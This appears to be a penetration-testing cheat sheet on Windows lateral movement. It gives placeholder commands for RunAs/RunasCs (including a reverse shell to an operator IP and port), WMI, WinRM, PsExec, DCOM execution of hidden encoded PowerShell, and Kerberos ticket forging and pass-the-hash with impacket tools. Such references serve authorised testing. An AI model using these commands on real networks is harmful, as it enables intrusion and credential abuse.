Lateral Movement

RunAs

Use the runas command to execute commands on behalf of another user on the same host.

runas /user:<USER> <COMMAND, ex. cmd>
# or 
Start-Process cmd.exe -Verb runAs

You can also use RunasCs.ps1 or RunasCs.exe to access a user who does not have remote access authorization via another user who does have it

Import-Module .\Invoke-RunasCs.ps1
Invoke-RunasCs <USER> <PASS> "cmd /c whoami /all"

.\RunasCs.exe <USER> <PASS> "cmd.exe -r <IP>:<PORT>"

WMI

We need the credentials of a member of the Administrators local group on the target host.

CMD

wmic /node:<IP> /user:<USER> /password:<PASS> process call create "<COMMAND>"

PowerShell

$credential = New-Object System.Management.Automation.PSCredential 'USER', (ConvertTo-SecureString '<PASS>' -AsPlaintext -Force)
$Session = New-Cimsession -ComputerName <IP> -Credential $credential -SessionOption (New-CimSessionOption -Protocol DCOM)
$command = '<COMMAND>';
Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

WinRM

We need the credentials of a member of the Administrators local group or Remote Management Users group on the target host.

CMD

winrs -r:<HOST> -u:'<USER>' -p:'<PASS>'  "cmd /c <COMMAND>"

PowerShell

$credential = New-Object System.Management.Automation.PSCredential 'USER', (ConvertTo-SecureString '<PASS>' -AsPlaintext -Force)
New-PSSession -ComputerName <IP> -Credential $credential
# See ID in the output
Enter-PSSession <ID>

PsExec

We need the credentials of a member of the Administrators local group, the ADMIN$ share available and File and Printer Sharing turned on (both default settings on modern Windows Server systems).

Details

To execute the command remotely, PsExec performs the following tasks:

Writes psexesvc.exe into the C:\Windows directory
Creates and spawns a service on the remote host
Runs the requested program/command as a child process of psexesvc.exe

psexec is not installed by default on Windows, we need to transfer it.

CMD

.\PsExec64.exe -i \\<HOST> -u <DOMAIN>\<USER> -p <PASS> cmd

DCOM

Interaction with DCOM is performed over RPC on TCP port 135 and local Administrator access is required to call the DCOM Service Control Manager, which is essentially an API.

[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","<IP_TARGTE>")).Document.ActiveView.ExecuteShellCommand("powershell",$null,"-nop -w hidden -e <COMMAND_B64>","7")

Kerberos Tickets

Set /etc/hosts and /etc/krb5.conf

/etc/hosts

<IP>     <DOMAIN.COM> <DC.DOMAIN.COM>

/etc/krb5.conf

[libdefaults]
  default_realm = <DOMAIN.COM>
  forwardable = yes
  dns_lookup_kdc = false
  dns_lookup_realm = false

[realms]
  <DOMAIN.COM> = {
    kdc = <DC.DOMAIN.COM>
  }

Get the TGT

getTGT.py -dc-ip <IP> '<DOMAIN.COM>/<USER>:<PASS>'
getTGT.py -dc-ip <IP> '<DOMAIN.COM>/<USER>' -hashes :<HASH>
ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> <NEW_USER>
# or with other techniques

Import it

chmod 600 <USER>.ccache
export KRB5CCNAME=<USER>.ccache
klist

Use with Kerberos authentication (-k)

nxc smb <IP_TARGET> --use-kcache --kdcHost <HOSTNAME_DC>
psexec.py -k -no-pass -dc-ip <DC_IP> [-target-ip <IP_TARGET>] <HOSTNAME_TARGET>
# also with impacket-secretsdump, impacket-wmiexec, etc.

Last updated 2 days ago

hashtagRunAs

hashtagWMI

hashtagWinRM

hashtagPsExec

hashtagDCOM

hashtagKerberos Tickets

RunAs

WMI

WinRM

PsExec

DCOM

Kerberos Tickets